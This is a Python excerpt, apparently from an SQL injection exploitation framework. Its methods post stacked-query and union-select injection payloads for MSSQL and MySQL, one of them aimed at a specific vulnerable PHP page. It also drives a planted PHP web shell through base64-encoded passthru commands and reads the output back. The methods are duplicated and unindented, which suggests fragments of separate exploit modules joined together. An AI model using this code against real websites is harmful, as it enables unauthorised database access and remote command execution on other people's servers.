def get_output(self): #, cmd, *args):
basedir = os.path.split(self.url)[0]
out = libsqljack.send_web_request("%s/output.txt" % basedir)
matches = re.findall("%s\s*(.*)" % self.mark_rand, out, re.DOTALL)
if matches:
return matches[0]
return ""
def get_output(self):#, cmd, *args):
if not self.pathok:
return False
basedir = os.path.split(self.url)[0]
POSTDATA = {'cmd' : "passthru(base64_decode('%s'));" % base64.b64encode(self.cmd)}
out = libsqljack.send_web_request("%s/%s" % (basedir, self.filename), POSTDATA)
return out
def place_payload(self, payload):
POSTDATA = {}
if payload.has_key("mssql_exec"):
POSTDATA['pwn'] = '2;%s' % payload["mssql_exec"]
elif payload.has_key("mssql_inject"):
POSTDATA['pwn'] = '-1 union select %s' % payload["mssql_inject"]
else:
self.log.error("Failed to placed payload.")
return False
self.result = libsqljack.send_web_request(self.url, POSTDATA)
return True
def place_payload(self, payload):
POSTDATA = {}
if payload.has_key("mysql_exec"):
POSTDATA['id'] = ";%s" % payload["mysql_exec"]
elif payload.has_key("mysql_inject"):
POSTDATA[
'id'] = '-1/**/union/**/all/**/select/**/1,%s,3,4/**/--/**/C' % payload[
"mysql_inject"]
else:
self.log.error("Failed to place payload.")
return False
vuln = "%s/vedi_faq.php" % (self.url)
self.result = libsqljack.send_web_request(vuln, POSTDATA)
return True